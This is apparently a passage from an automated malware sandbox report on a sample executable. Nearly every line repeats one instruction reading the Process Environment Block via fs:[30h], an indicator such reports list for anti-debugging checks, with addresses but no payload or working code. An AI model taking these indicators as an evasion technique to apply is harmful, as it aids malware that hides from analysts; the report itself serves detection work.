            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov ecx, dword ptr fs:[00000030h]4_2_01A8E3DB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8E3DB mov eax, dword ptr fs:[00000030h]4_2_01A8E3DB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F03E9 mov eax, dword ptr fs:[00000030h]4_2_019F03E9
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A843D4 mov eax, dword ptr fs:[00000030h]4_2_01A843D4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A843D4 mov eax, dword ptr fs:[00000030h]4_2_01A843D4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DC310 mov ecx, dword ptr fs:[00000030h]4_2_019DC310
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A30B mov eax, dword ptr fs:[00000030h]4_2_01A1A30B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A30B mov eax, dword ptr fs:[00000030h]4_2_01A1A30B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A30B mov eax, dword ptr fs:[00000030h]4_2_01A1A30B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A00310 mov ecx, dword ptr fs:[00000030h]4_2_01A00310
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8437C mov eax, dword ptr fs:[00000030h]4_2_01A8437C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A62349 mov eax, dword ptr fs:[00000030h]4_2_01A62349
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AAA352 mov eax, dword ptr fs:[00000030h]4_2_01AAA352
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A88350 mov ecx, dword ptr fs:[00000030h]4_2_01A88350
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov ecx, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6035C mov eax, dword ptr fs:[00000030h]4_2_01A6035C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov ecx, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A762A0 mov eax, dword ptr fs:[00000030h]4_2_01A762A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A60283 mov eax, dword ptr fs:[00000030h]4_2_01A60283
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A60283 mov eax, dword ptr fs:[00000030h]4_2_01A60283
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A60283 mov eax, dword ptr fs:[00000030h]4_2_01A60283
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E284 mov eax, dword ptr fs:[00000030h]4_2_01A1E284
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E284 mov eax, dword ptr fs:[00000030h]4_2_01A1E284
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02A0 mov eax, dword ptr fs:[00000030h]4_2_019F02A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02A0 mov eax, dword ptr fs:[00000030h]4_2_019F02A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EA2C3 mov eax, dword ptr fs:[00000030h]4_2_019EA2C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02E1 mov eax, dword ptr fs:[00000030h]4_2_019F02E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02E1 mov eax, dword ptr fs:[00000030h]4_2_019F02E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F02E1 mov eax, dword ptr fs:[00000030h]4_2_019F02E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D823B mov eax, dword ptr fs:[00000030h]4_2_019D823B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E6259 mov eax, dword ptr fs:[00000030h]4_2_019E6259
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DA250 mov eax, dword ptr fs:[00000030h]4_2_019DA250
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A90274 mov eax, dword ptr fs:[00000030h]4_2_01A90274
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A68243 mov eax, dword ptr fs:[00000030h]4_2_01A68243
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A68243 mov ecx, dword ptr fs:[00000030h]4_2_01A68243
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D826B mov eax, dword ptr fs:[00000030h]4_2_019D826B
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A250 mov eax, dword ptr fs:[00000030h]4_2_01A9A250
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A250 mov eax, dword ptr fs:[00000030h]4_2_01A9A250
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4260 mov eax, dword ptr fs:[00000030h]4_2_019E4260
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4260 mov eax, dword ptr fs:[00000030h]4_2_019E4260
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E4260 mov eax, dword ptr fs:[00000030h]4_2_019E4260
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A605A7 mov eax, dword ptr fs:[00000030h]4_2_01A605A7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A605A7 mov eax, dword ptr fs:[00000030h]4_2_01A605A7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A605A7 mov eax, dword ptr fs:[00000030h]4_2_01A605A7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A045B1 mov eax, dword ptr fs:[00000030h]4_2_01A045B1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A045B1 mov eax, dword ptr fs:[00000030h]4_2_01A045B1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E2582 mov eax, dword ptr fs:[00000030h]4_2_019E2582
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E2582 mov ecx, dword ptr fs:[00000030h]4_2_019E2582
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A14588 mov eax, dword ptr fs:[00000030h]4_2_01A14588
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E59C mov eax, dword ptr fs:[00000030h]4_2_01A1E59C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E5E7 mov eax, dword ptr fs:[00000030h]4_2_01A0E5E7
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C5ED mov eax, dword ptr fs:[00000030h]4_2_01A1C5ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C5ED mov eax, dword ptr fs:[00000030h]4_2_01A1C5ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E65D0 mov eax, dword ptr fs:[00000030h]4_2_019E65D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E5CF mov eax, dword ptr fs:[00000030h]4_2_01A1E5CF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E5CF mov eax, dword ptr fs:[00000030h]4_2_01A1E5CF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A5D0 mov eax, dword ptr fs:[00000030h]4_2_01A1A5D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A5D0 mov eax, dword ptr fs:[00000030h]4_2_01A1A5D0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E25E0 mov eax, dword ptr fs:[00000030h]4_2_019E25E0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0E53E mov eax, dword ptr fs:[00000030h]4_2_01A0E53E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A76500 mov eax, dword ptr fs:[00000030h]4_2_01A76500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0535 mov eax, dword ptr fs:[00000030h]4_2_019F0535
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01AB4500 mov eax, dword ptr fs:[00000030h]4_2_01AB4500
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1656A mov eax, dword ptr fs:[00000030h]4_2_01A1656A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1656A mov eax, dword ptr fs:[00000030h]4_2_01A1656A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1656A mov eax, dword ptr fs:[00000030h]4_2_01A1656A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8550 mov eax, dword ptr fs:[00000030h]4_2_019E8550
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8550 mov eax, dword ptr fs:[00000030h]4_2_019E8550
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A144B0 mov ecx, dword ptr fs:[00000030h]4_2_01A144B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6A4B0 mov eax, dword ptr fs:[00000030h]4_2_01A6A4B0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A49A mov eax, dword ptr fs:[00000030h]4_2_01A9A49A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E64AB mov eax, dword ptr fs:[00000030h]4_2_019E64AB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E04E5 mov ecx, dword ptr fs:[00000030h]4_2_019E04E5
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A66420 mov eax, dword ptr fs:[00000030h]4_2_01A66420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1A430 mov eax, dword ptr fs:[00000030h]4_2_01A1A430
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18402 mov eax, dword ptr fs:[00000030h]4_2_01A18402
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18402 mov eax, dword ptr fs:[00000030h]4_2_01A18402
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A18402 mov eax, dword ptr fs:[00000030h]4_2_01A18402
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DC427 mov eax, dword ptr fs:[00000030h]4_2_019DC427
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE420 mov eax, dword ptr fs:[00000030h]4_2_019DE420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE420 mov eax, dword ptr fs:[00000030h]4_2_019DE420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019DE420 mov eax, dword ptr fs:[00000030h]4_2_019DE420
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019D645D mov eax, dword ptr fs:[00000030h]4_2_019D645D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6C460 mov ecx, dword ptr fs:[00000030h]4_2_01A6C460
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0A470 mov eax, dword ptr fs:[00000030h]4_2_01A0A470
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0A470 mov eax, dword ptr fs:[00000030h]4_2_01A0A470
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0A470 mov eax, dword ptr fs:[00000030h]4_2_01A0A470
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1E443 mov eax, dword ptr fs:[00000030h]4_2_01A1E443
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A0245A mov eax, dword ptr fs:[00000030h]4_2_01A0245A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A9A456 mov eax, dword ptr fs:[00000030h]4_2_01A9A456
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A947A0 mov eax, dword ptr fs:[00000030h]4_2_01A947A0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A8678E mov eax, dword ptr fs:[00000030h]4_2_01A8678E
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E07AF mov eax, dword ptr fs:[00000030h]4_2_019E07AF
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A6E7E1 mov eax, dword ptr fs:[00000030h]4_2_01A6E7E1
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A027ED mov eax, dword ptr fs:[00000030h]4_2_01A027ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A027ED mov eax, dword ptr fs:[00000030h]4_2_01A027ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A027ED mov eax, dword ptr fs:[00000030h]4_2_01A027ED
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019EC7C0 mov eax, dword ptr fs:[00000030h]4_2_019EC7C0
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E47FB mov eax, dword ptr fs:[00000030h]4_2_019E47FB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E47FB mov eax, dword ptr fs:[00000030h]4_2_019E47FB
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A607C3 mov eax, dword ptr fs:[00000030h]4_2_01A607C3
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C720 mov eax, dword ptr fs:[00000030h]4_2_01A1C720
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C720 mov eax, dword ptr fs:[00000030h]4_2_01A1C720
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0710 mov eax, dword ptr fs:[00000030h]4_2_019E0710
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A5C730 mov eax, dword ptr fs:[00000030h]4_2_01A5C730
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1273C mov eax, dword ptr fs:[00000030h]4_2_01A1273C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1273C mov ecx, dword ptr fs:[00000030h]4_2_01A1273C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1273C mov eax, dword ptr fs:[00000030h]4_2_01A1273C
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1C700 mov eax, dword ptr fs:[00000030h]4_2_01A1C700
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A10710 mov eax, dword ptr fs:[00000030h]4_2_01A10710
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E0750 mov eax, dword ptr fs:[00000030h]4_2_019E0750
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1674D mov esi, dword ptr fs:[00000030h]4_2_01A1674D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1674D mov eax, dword ptr fs:[00000030h]4_2_01A1674D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_01A1674D mov eax, dword ptr fs:[00000030h]4_2_01A1674D
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019E8770 mov eax, dword ptr fs:[00000030h]4_2_019E8770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exeCode function: 4_2_019F0770 mov eax, dword ptr fs:[00000030h]4_2_019F0770
